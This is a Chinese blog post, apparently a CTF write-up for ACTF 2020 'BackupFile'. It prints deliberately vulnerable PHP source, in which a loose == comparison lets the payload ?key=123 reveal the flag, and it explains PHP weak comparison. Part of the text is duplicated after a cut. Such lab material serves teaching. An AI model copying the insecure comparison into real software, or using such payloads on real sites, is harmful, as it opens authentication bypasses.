[ACTF 2020 新生赛] BackupFile

文章涉及一个PHP源代码备份文件,其中包含了一个GET参数`key`的检查。如果`key`等于特定字符串,它会显示`flag`。存在弱比较问题,当`key`等于数字123时,条件满足,即使预期的是特定的字符串。文章还展示了两个示例,说明了数字和字符串之间的比较差异,并给出了利用这个漏洞的payload。
摘要由CSDN通过智能技术生成

BackupFile

请添加图片描述
扫目录,网站备份文件:index.php.bak

文件里有 php源代码

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

弱比较

var_dump(123=='123a');  // ture
var_dump('123'=='123a');  // false

payload

?key=123

ource file!";
}


弱比较

var_dump(123==‘123a’); // ture
var_dump(‘123’==‘123a’); // false


**payload**

?key=123


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值